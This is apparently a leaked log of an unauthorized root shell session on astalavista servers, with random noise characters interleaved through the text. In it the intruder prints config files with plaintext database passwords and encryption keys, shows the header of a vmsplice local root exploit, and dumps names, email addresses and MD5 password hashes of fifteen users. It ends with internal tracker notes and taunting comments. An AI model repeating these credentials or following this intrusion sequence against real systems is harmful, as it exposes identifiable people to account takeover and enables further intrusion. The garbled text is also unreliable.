+ F" t6 k& ~/ J# j: y) qdrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth% M6 w& C" @+ g
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
1 [& d8 _" G' o: x4 x; C" `: ]/ c" o-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout  U7 ?- S$ i1 c- b( z1 [/ e; W
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile6 r; r2 k& m( W3 J: W) ]
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc. W4 j/ f# a* v
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
1 {0 t. n6 Y& |! }drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
0 E' c. E: V1 i) ldrwx——  2 astanet astanet 4096 Dec 23 12:18 mail
1 R4 X: D" \4 q' b3 ]; ]8 P0 k-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history; o% ?7 w  _8 z3 E
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
0 m* b4 L+ b: e/ R  C-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow, O. ?6 P* @# h3 t

6 D& O, U* p; A0 l( o' zsh-3.2# cd auth/
0 E* |; K3 v" z" F- n- U% T& [0 o( ]sh-3.2# ls -la
  i2 |: F" K2 h, Etotal 287 _1 i* {  e$ w- k: d
drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .( l0 E$ ?! x8 |7 u% @5 p% C* @
drwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..
) t, r" f& i$ ?/ L: i/ B-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
# c- g# F# m; J-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php
% E( Y4 m1 S7 S' P) ~-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd
/ M2 f" m) s$ h9 g5 o  a-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting6 R& G1 R# w- A" I+ o/ N9 |, d, s( m
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd& n0 B) G. x2 c) w% W5 \

0 ^: H' m- C8 `! U9 y5 F3 lsh-3.2# cat hackercontest.config.inc.php$ h" @- I4 N: `$ l% v
<?PHP
$ R5 Z" U5 d* H) M" h! F2 P: T* q* ^// Variabeln f?r Verbindung zur Datenbank //
2 ]2 q1 X" S3 W/ ~3 c4 @- p$conxHost = ‘localhost’;                       // MySQL hostname2 e3 o9 |( J+ b, p
$conxUser = ‘hackercontest’;                                       // MySQL user: G# l7 R+ ^% @6 q, _2 a2 [
$conxPassword = ‘K6m@7dUc’;                    // MySQL password% Z5 m1 y9 S$ y$ F( N
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish3 H+ k2 {- N8 |- v( e' I0 ^* V+ [# [
?>
, W" O1 ~8 a4 W4 H( N' C, lsh-3.2# cat hosting.config.inc.php
0 x& S' A  Q6 V% ~<?PHP! N: {2 z% l6 `4 h
// Variabeln f?r Verbindung zur Datenbank //" \; d" M# L* G8 j8 W) f
$conxHost = ‘localhost’;                       // MySQL hostname
4 O' t% E0 k0 w$conxUser = ‘hostinguser’;                                 // MySQL user  u$ s7 }' g+ K! ?0 f" @1 c8 L0 |7 @
$conxPassword = ‘cXvB3981′;                    // MySQL password+ i4 t2 G8 j$ h9 c6 Q% r0 d0 i
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish+ W' P9 f9 A% Q  \1 V3 ?3 a
?>
3 J6 L" `* L( D2 {3 b! d
  Q/ d: ~- ~5 E, J$ j4 W1 L: _sh-3.2# cd ..4 b; g  S8 S& R
sh-3.2# cd com
$ R' _, _) I6 h: w5 F; Zsh-3.2# ls -la0 f7 r* c, j" q7 w( m
total 141208
& k% |+ \( C, N+ c; a  i  o% Ldrwx–x–x 10 com  com       4096 Apr 28 12:40 .+ M# E$ v2 I$ r/ d/ y
drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..( E3 T( h( I  `" I2 R
drwx——  2 com  com       4096 Jun  4 04:04 backups
& I! g2 g4 n& _1 m* a9 I  o+ H-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql: z4 f' r$ W3 I* [1 a
drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system/ i; T8 [& u; J8 B
-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history, ?+ M  V/ A1 x) k- a, v, e3 K: X
-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout
" s0 {# b) ~7 x/ h+ d( ?-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile& O; t- k" q3 s& ?. i9 h, T
-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc( L8 @+ \. ?* `9 {% |0 B
drwx–x–x  3 com  com       4096 Jan 29  2008 domains
6 |/ K- m3 ^! p6 s, U5 n-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed) g* g) L: E( C( g+ E1 K# q6 I- t
drwxrwx—  3 com  mail      4096 Jan  6 19:24 imap4 ?6 }$ ]- G7 x+ Y7 u/ s& U3 c, |* h0 f
-rw——-  1 com  com         69 Nov 18  2008 .lesshst3 V% b$ x: o7 X0 n% {5 K
drwx——  2 com  com       4096 Sep 24  2007 mail
1 t& k% e; o) a: N9 }" s' S0 J-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history
, ^9 F2 l# t3 z, K( H0 adrwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
9 ?& M7 O' Z' Q! ^! t- R% qlrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
9 O0 U7 o' C( y* {  }-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow
0 r  M9 ?5 S; Udrwx——  2 com  com       4096 Aug 26  2008 .ssh
! B- A% ^! b" _: Z; k8 }6 \-rwx——  1 com  com       8515 Feb 10  2008 t
7 b# C9 o. K3 Y' t& I1 g% N-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c- e5 `% v2 M# [3 O- S! `0 E
drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
  T$ i! }1 U' C' n-rw-rw-r–  1 com  com        617 May 20  2008 .toprc) D; q* ?# v1 G
-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
7 \6 j, N' t& m+ O-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo
, l9 e3 T1 m& h9 n2 T8 i* s1 T-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
5 i6 I) h) n  \5 G  P3 c0 A! C0 O9 M  m) Z
sh-3.2# head t.c
* P5 E' q7 b( |0 `2 ^+ z/*  O7 R0 N2 n( O
* jessica_biel_naked_in_my_bed.c
' \* E8 k, s5 a; i9 j* g7 @: z*5 K9 z5 ^$ `/ P6 t- E
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
" }7 O! E4 [; U$ n* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.* V8 L2 u4 O# ^9 C& }4 H
* Stejnak je to stare jak cyp a aj jakesyk rozbite.+ g$ O$ N( k" h
*
$ L1 c2 {1 f5 K+ k7 S* Linux vmsplice Local Root Exploit# j8 v( U+ n9 ]. B+ B- u* a
* By qaaz
0 {& s; r1 p0 l$ t% x/ Z! A! J  x" S*8 N2 W* P& L$ L' y, y
/ G* S1 O5 c8 W( {6 H
sh-3.2# cd /
* Y8 w. ~' ?6 r, E9 x7 f0 Fsh-3.2# ls -la
6 d; ?& q  m, \3 {( X( atotal 360
$ E: s" q+ b$ a5 L  n- ndrwxr-xr-x  25 root root   4096 Jun  3 02:43 .
" G3 K4 i! L0 n- U$ H5 _drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
/ _% s* f8 K0 {8 e6 D& X' K2 a& [-rw——-   1 root root  10240 Jun  3 02:39 aquota.group5 O( Z: @! b/ z( n: V. K
-rw——-   1 root root  10240 Jun  3 02:39 aquota.user
/ P! _6 W/ z& n9 O/ p; a$ ~; Z-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db- H  b) l/ e3 ]1 h0 g
-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck, P0 v( M% p# W$ ~" X$ k! g- F3 v
-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel
4 X. y" g4 ?9 }% ?5 t% _drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
4 V. h/ A3 _6 _+ @$ F7 Jdrwxr-xr-x   2 root root   4096 Jun  4 04:03 bin% p* S% J2 ]  i' y1 B9 {6 Z
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
+ c* s* H6 o1 o" S/ f0 ^drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
1 g; G0 p* e) {* Q8 o7 Udrwxr-xr-x  84 root root  12288 Jun  4 03:16 etc' ]7 p: P. N" R9 P3 `, ]
drwxr-xr-x  14 root root   4096 Mar 11 17:56 home8 L4 i, k. O* A$ X2 C( J
-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf4 G9 y/ _0 P' ^. n1 i4 L& }2 i
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
: C% S& O% f4 c( |+ qdrwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
0 |: N7 E" a6 V$ w3 pdrwx——   2 root root  16384 Sep 11  2007 lost+found
9 H/ N7 d" E8 p% v' bdrwxr-xr-x   2 root root   4096 Mar 11 17:56 media5 u& T3 `( w1 `  o5 A1 O2 [6 Q! f
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc/ k  C9 m: w* v
drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
/ }# W5 U- l' z- l2 g& d-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg
* H; T* q$ c5 g# xdrwxr-xr-x   2 root root      0 Jun  3 02:43 net
; @) f2 U+ a3 M9 K. o! G0 udrwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
$ x1 z: h4 g9 S9 Ydr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
% `' [; W0 Z8 J4 ^' l  ~$ zdrwxr-x—  15 root root   4096 Jun  4 08:40 root2 B. B. J* c/ [8 o" o2 Y- a
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
& Y9 z- V) |3 R0 H0 W- t2 v8 Vdrwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux7 z& L$ D7 g& m8 f8 Q  m
drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv$ Q% z2 G" x$ I1 p9 v& A
drwxr-xr-x  11 root root      0 Jun  3 02:42 sys
0 u  L  {) M  x. ~+ p4 ^9 Wdrwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
+ `7 O- e9 q1 x: z# hdrwxr-xr-x  16 root root   4096 Jun  2 13:56 usr; y* `7 p! v$ V8 P) S* s% _
drwxr-xr-x  26 root root   4096 Jun  4 03:16 var2 u% [" s; L( o
/ u* P% F. {' q4 [1 }4 ^8 I) q$ Z
sh-3.2# cd opt
" ]2 s5 m9 S; }$ I. gsh-3.2# ls -la+ a4 W/ q( A4 C
total 20
5 U/ h8 @- _5 I" Y- l, Vdrwxr-xr-x  3 root root 4096 Mar 11 17:56 .( B& N: O4 v2 J: J5 g# {
drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
  w% r0 [$ I% }/ z- B* ]drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
* o* }% N$ I; L3 f3 P( j1 S& C: E
7 K0 P. P  K* ]* F' h3 Vsh-3.2# cd lsws// v/ {( H& ?% r8 r
sh-3.2# ls -la
7 O( O1 ^9 M9 y$ A5 D  Ztotal 108
1 S8 h- f6 P3 }' l* U+ ^4 N8 t8 Rdrwxr-xr-x 15 root   root    4096 Mar 20  2008 .
1 X  W3 d/ F- T( Fdrwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..; o/ R' s; Y2 @, _' H
drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
' `8 x" M( T" p7 i9 hdrwxr-xr-x 13 root   root    4096 May 29 15:10 admin8 o, g& a# ~& s0 u5 ~; Z4 y. X
drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate8 M# f, N5 a. F, [% u
drwxr-xr-x  2 root   root    4096 May 29 15:10 bin  V5 b: s/ j3 L5 G: |3 Y* I
drwx——  4 apache apache  4096 Jun  3 02:43 conf
1 {5 T' O/ p7 Z( H$ Kdrwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
; W- x$ `; P8 [5 ^+ b4 L! ~drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs1 M' y; k, P" F
drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
+ P6 c+ h' F% w3 `  m* b( ^drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
/ R/ P" l: [+ B" C-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE
* w. ~0 p& z; k/ q-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP8 }1 k7 s7 x5 M0 x5 y
-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL7 E) _5 _- N& G! Q$ J. B4 f1 j
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP! v" X8 ]9 F; e" e  r8 P
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
7 s- j+ j* e+ w# o% K* v4 W( `drwxr-xr-x  2 root   root    4096 Mar 20  2008 php' t1 A0 C0 I0 h3 O1 l
drwx——  2 apache apache  4096 Mar 20  2008 phpbuild5 d* l0 @2 m4 j8 M4 [
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share# |2 T" I/ e' w1 j% M2 I8 C$ ?1 d
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION7 h1 y/ H  W' K8 C3 z

6 A+ E. v4 ]1 dsh-3.2# cd conf
- y! _0 _7 f- p# m8 Q, U8 }sh-3.2# ls -la
% {9 X8 p7 n. A) m- j* dtotal 48
- s% a0 o8 `5 _4 a5 Odrwx——  4 apache apache 4096 Jun  3 02:43 .
4 R8 g- `/ _2 X) h2 u! t  }drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
8 [; X7 X( D+ v1 |* _4 p8 O& @6 Adrwx——  2 apache apache 4096 Mar 20  2008 cert! N; K+ G6 W4 G: C0 ?7 H) l
-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml& K# G# G/ L/ S2 x) H
-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak+ Y; ?0 ~  ]! L; h# O
-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last
6 E, s; k; l# I" }  `-rw——-  1 apache apache  256 May 29 15:10 license.key! t+ P& [: J8 S! W5 B/ u0 N
-rw——-  1 apache apache  256 Mar 21  2008 license.key.old
- h; n! X2 w$ u; @-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties* S/ M, B8 _4 ^* F
-rw——-  1 apache apache   20 May 29 15:10 serial.no/ ^4 l0 R& c- }6 i
drwx——  2 apache apache 4096 Mar 20  2008 templates0 d0 }' V- {2 s1 R) u8 t

- J& H$ c0 F5 h2 u& Ssh-3.2# cat serial.no6 C" o1 D& V! C# @2 h
IbDl-oVsO-CKqL-wVRa3 s' `0 D2 K7 {- j
# u# o& s) x5 u6 _
sh-3.2# mysql  d1 l, a' ^! R: n
Welcome to the MySQL monitor.  Commands end with ; or \g.
3 n) a4 A& l, n, l2 x1 s" }Your MySQL connection id is 2868444 g& N. U1 R) `- G* g* a. Z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)) w8 p2 ~& @3 d
6 x7 L2 ^( v: t/ z7 {
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
6 y: G. a( S8 R& l# [; Y8 M: C
) F3 I. ~$ W+ e9 ]* m4 Emysql> show databases;
% b0 F9 f/ j, j% t% I8 M+———————–+1 O' E# m2 _0 p" ?* e
| Database              |, ^& q$ n2 p' V3 P  I9 a
+———————–+
7 H; ~: C3 C, }8 g/ E| information_schema    |% k9 u7 i' \0 K% v
| astanet_ads           |( H' Z9 E0 [0 h/ t, G
| astanet_mailing_lists |
8 _$ J  o$ |7 G# {- B2 W| astanet_mediawiki     |$ s3 M, W0 `9 D# {
| astanet_membersystem  |
1 ~2 K; e6 W7 p) ^: I' w| com_contrexx          |
" M2 v! P" B' s| com_contrexx2         |
6 X! D/ U* t/ \" ^. W| com_contrexx2_live    |
# g$ D* q3 I/ g1 Z; ]( e| da_roundcube          |
, {3 f' P& {  g( Z' [( q| dolphin               |
8 \8 ~7 @% c. o: o| ideapool              |
" u2 e1 {% T( r| mysql                 |7 C/ o! e" p( V
| test                  |
: T4 {) t: H) v. J| yourmaster            |( l9 \1 [7 N1 J: r4 _6 _* d( }
+———————–+. b# V7 e' X% V# _. [
14 rows in set (0.00 sec), M' t; }0 C8 b

7 F* Z% @( A; R9 \4 j" xmysql> use ideapool0 {8 F# k$ p  _% N4 k3 c8 F1 j
Database changed2 d: I  U2 c6 ]# r% W" E8 E
mysql> show tables;
" Y) _+ Q2 T3 V: W+———————————–+; Q$ W' s6 m% E: n
| Tables_in_ideapool                |
; F* I. B' G/ j( l) r9 R+———————————–+  a3 ]8 U. A, X9 D- Q' A
| eventum_columns_to_display        |
3 p- y4 E9 v, B5 h* {| eventum_custom_field              |; s4 P8 j2 E2 s& i
| eventum_custom_field_option       |
( s3 e2 J. S+ `7 K! P| eventum_custom_filter             |
3 M, r- K6 o, r  ?+ N3 y* a| eventum_customer_account_manager  |6 h5 k: I4 k8 u: B/ f' t
| eventum_customer_note             |
$ l: q6 e0 |0 R$ a, C0 {: s+ d| eventum_email_account             |8 ?% @8 z8 e2 _* s4 t
| eventum_email_draft               |
" J! j1 ~- \# a* c9 l# V+ j# V| eventum_email_draft_recipient     |2 {4 w& r8 m% g4 b* A; F/ J' M
| eventum_email_response            |
2 J4 O8 V- x3 y) ]| eventum_faq                       |9 s; |  K5 ^* V/ q( ^7 L
| eventum_faq_support_level         |  q+ O! @6 ^2 `, A# p. R8 A, [$ s
| eventum_group                     |, L$ _% Z) A' Z( k" v9 }, _
| eventum_history_type              |
! T0 o5 o) [0 L6 z8 G| eventum_irc_notice                |
5 U0 a1 v3 e9 {4 i/ ^| eventum_issue                     |
9 Y- s- ]. i; L3 d& t| eventum_issue_association         |
; L$ l+ j0 D7 l% G/ ~| eventum_issue_attachment          |7 D2 N/ u( A1 e- \! N8 \2 |
| eventum_issue_attachment_file     |0 S* \( a9 _8 u* }7 |; r
| eventum_issue_checkin             |0 r" |" F. n" l% R$ X2 E5 b
| eventum_issue_custom_field        |- X8 P: E' ?9 w- q6 O
| eventum_issue_history             |
% ~+ n% M. B+ K/ x6 `, {4 G! H* q| eventum_issue_quarantine          |
: {- l+ `6 }) m* z! X3 ?| eventum_issue_requirement         |0 g; F* G; J, d; h- }: I+ w. ?
| eventum_issue_user                |9 i+ h  R* @* w8 O- _4 f" p( [
| eventum_issue_user_replier        |9 P& x$ s: U3 d; r
| eventum_link_filter               |
4 i1 y& p3 P3 `- B3 A3 j1 P| eventum_mail_queue                |8 m9 ^9 X9 q) x2 W
| eventum_mail_queue_log            |) ~$ _0 ?4 E  H7 Y2 `* t. ^
| eventum_news                      |4 N5 J$ Y5 n0 l" n5 n, w8 T9 w7 a
| eventum_note                      |; d+ p+ @- O5 J" J0 i6 u
| eventum_phone_support             |
3 \. a4 P8 U& x# q| eventum_project                   |6 j& L4 \" P' p2 N6 z
| eventum_project_category          |- B' h) R$ [2 j( C2 G
| eventum_project_custom_field      |" g5 s7 E- K. R! I
| eventum_project_email_response    |
1 m. ~" h) Y, l, w! y8 i( q0 ]! x8 M| eventum_project_field_display     |2 ^( v1 s. [, y$ U' V
| eventum_project_group             |: C6 U4 d3 ?4 a  w# M
| eventum_project_link_filter       |
+ j+ Q( B& M9 C& r% E& c/ }| eventum_project_news              |
+ c! [9 e; e- t6 X1 e: s| eventum_project_phone_category    |
8 l! E4 i- [0 E5 B. o2 y5 Z| eventum_project_priority          |' u( X; V1 |+ A7 Z- z
| eventum_project_release           |9 Z. O, e9 ]3 e" O# w" Q
| eventum_project_round_robin       |% X9 X0 D3 C0 Z( Y$ C+ O/ {& m
| eventum_project_status            |3 R6 s7 Y  z$ `9 X
| eventum_project_status_date       |
4 J( [# n% g5 [  O% L| eventum_project_user              |& u7 e/ c4 K0 R# U$ o5 I1 h4 o
| eventum_reminder_action           |
/ h9 p3 m- M* g$ x: @# ?| eventum_reminder_action_list      |0 k( I2 ~+ P) r# h$ P
| eventum_reminder_action_type      |
2 w8 {3 W/ `1 y5 k0 T8 O: u9 v8 P2 Z| eventum_reminder_field            |
! k  m  j3 U! O| eventum_reminder_history          |
( n0 ^' V6 K  p| eventum_reminder_level            |
3 K7 V& _% g/ e0 J9 R: H| eventum_reminder_level_condition  |* U2 S% u: _6 r& s6 j
| eventum_reminder_operator         |
6 ]6 M, x6 i8 h) q( v$ G& W| eventum_reminder_priority         |5 `- p* O5 C* `( @
| eventum_reminder_requirement      |1 e( l$ H! _1 W% Q2 Y5 w/ L
| eventum_reminder_triggered_action |; r9 ?6 o2 q: q$ l( W* j
| eventum_resolution                |
2 S' s& [7 N: n- k| eventum_round_robin_user          |
, S0 Q  T$ `* o; _| eventum_search_profile            |
6 m5 X" `8 s* e9 N| eventum_status                    |
$ N: Z% B1 F  U. l' k# l6 c| eventum_subscription              |: d5 g! C! J3 |; E6 }) G. n4 q
| eventum_subscription_type         |. s" J$ Z' P: N' Z. f$ x3 q
| eventum_support_email             |
3 b* T3 r7 b6 @+ e6 ?  |1 P| eventum_support_email_body        |. O$ ?4 [0 C$ n. }( c
| eventum_time_tracking             |
  n: i6 Z$ x. i| eventum_time_tracking_category    |
) o: n# \: s6 G3 `4 r( H6 P+ q! [! O| eventum_user                      |
4 Q1 a1 O# x- F7 n3 t+———————————–+- u/ h0 v1 M& e( X8 T" d' H6 E
69 rows in set (0.00 sec)
2 B8 F  E, B+ D9 h% q8 A
, s- }( d( e. y4 Z# qmysql> describe eventum_user;
* R. S5 k3 @. l" v' W& D+————————-+——————+——+—–+———————+—————-+
! ^1 e8 y4 T& O% F# Y( \6 f| Field                   | Type             | Null | Key | Default             | Extra          |
3 h% x1 a+ Q) v! m+————————-+——————+——+—–+———————+—————-+
0 F6 |$ t- J6 Y' M  J0 T| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
' n, x4 [) k0 J1 t1 R# Z| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
; |8 x5 T0 E# A| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |
6 q0 Z1 I6 M5 z) H" y- R| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
( c+ u9 b1 \, s5 A| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
5 {# B' R- W( \' H5 _7 \1 h) ~9 t  B1 M| usr_status              | varchar(8)       | NO   |     | active              |                |
* n" M, e; N" R! }' i- V; q| usr_password            | varchar(32)      | NO   |     |                     |                |0 x6 \) I0 G9 y" L  N& J3 b
| usr_full_name           | varchar(255)     | NO   |     |                     |                |
+ k, R  ], |9 t, x9 C3 A| usr_email               | varchar(255)     | NO   | UNI |                     |                |
" U/ M, B3 ^: e! k& k& _- A3 ^$ i/ l| usr_preferences         | longtext         | YES  |     | NULL                |                |
6 m9 J  S: |# f! x! U, Y| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
: {7 `( r# i# h% L| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |9 Z( {" N1 o5 t# V
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |* m  ?/ W9 p' Q9 l/ x1 E" W
+————————-+——————+——+—–+———————+—————-+1 c7 h0 L; a5 I& D7 @1 C& z1 Q' X
13 rows in set (0.00 sec)7 o. m! {0 b. e9 M" Y9 i$ u# q& l

7 V  r5 |2 {3 Y$ omysql> select usr_full_name,usr_email,usr_password from eventum_user;
$ }& b( F2 O0 K, C6 f+———————-+——————————-+———————————-+
) ^9 j# }: A2 i4 g1 _9 o| usr_full_name        | usr_email                     | usr_password                     |  Q' ?$ l3 J. R% k! A! ]6 r
+———————-+——————————-+———————————-+
0 `; @( k# C7 s- V: p| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |
, i7 F" a$ {- J| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |$ e- i" t+ K1 I
| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
3 a$ m; W! Z# j: p| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
* {* ^1 b' k' Z  c: q$ u| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |
6 ?+ d- I! g2 ?- i| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |
/ g! g2 G4 u; k7 K  e) x! v| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
& m" P$ F6 J# l4 }1 d| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
+ T9 ~' w: h9 i7 ^+ f9 y9 [| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
# E# _( L8 C" a& @* b/ G* y| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
+ w: Z: t/ F7 g* R9 g  X0 r| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |
/ [9 z6 o! s9 E" T$ J* t| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |" _, N9 s0 u! C. ?. C
| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
5 O6 H3 y0 a/ `  Z$ g9 W' ~4 @| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |8 S  g4 ^( [! E% @) ~  o  l
| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |, y1 L5 n5 g# w, U3 M9 v
+———————-+——————————-+———————————-+- r& K- m4 R$ I0 A# G3 \
15 rows in set (0.00 sec)
" ]; T& K/ {- ~: A) a+ k. g: [9 _) W1 P' y& t: K, k$ X& Y
mysql> select iss_description from eventum_issue where iss_id = 43;1 z& K; V& v( p' @5 P3 g1 ?
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
3 U- `3 Q/ l, O% P. @  Z| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
0 M- t# c. F4 |* p% e|" N5 y! y. F6 F& P
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+4 m$ R  `& p" h+ K0 f6 y  N( X
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
. q: D' P- ?$ Q$ ]9 u& Econnected for 90 mins… 120mins… so what i propose is something like:
1 d, o5 [$ t2 `. G- [* z; p链接标记[url]http://www.surfthechannel.com/[/url]% ^; y& a- Y! G1 h$ ]
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
; f% L% `* D) q  o; Q( Mlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
/ W# a. o* }3 H7 k( }# Ybreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off% c1 L) L' w0 e- o* a; |' S2 d
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…# u3 R& i; x' M+ M  [, Y1 L
$ |# t7 z7 T. H/ p
We could also put advertisement during play on the flash video player itself… extra $$…
" N. X# L% E) m+ |5 p$ p2 a% Q
9 t# S% E- G! }$ y: u- P* pBy sykadul |- f0 o. ?$ o+ `5 a& r0 E- _
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
1 P. g3 C+ T# ~8 Q3 J; u% K1 k1 row in set (0.00 sec)" ]$ ^2 }9 }8 P* n' e# h% ?
- o& P' t7 k, ]2 S0 d7 h- y2 {/ ?
// Money and extra $$ is all they care about. remember that.; W! k6 q% v2 d/ o% X; z, Q
" f, q$ j6 U, d9 L! r$ t; O
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;7 l4 k+ r( T* p) T1 r* }" s! B: r
+————————+——————————————————————————————————————————————————————————————————————————————-+
. V0 o( c) c4 ]| iss_summary            | iss_description                                                                                                                                                                                                                          
6 Q( R" q) x2 Q5 O|, o7 y; z0 h9 x% o
+————————+——————————————————————————————————————————————————————————————————————————————-+
! s6 d2 T) s5 m6 || Forum for REAL EXPERTS | Hello,
9 t' M6 j1 r" O8 Z, G( [' e% u+ [! R6 g
Ishtus and I,
$ e) I6 S7 B/ v& Q; F5 W/ ~  A8 K/ ?# s% Z: h) r( ]
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide1 o% a2 Y. c1 ~, u/ |6 I8 g7 n
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
/ j8 R5 r8 L6 C& J2 L: i6 a
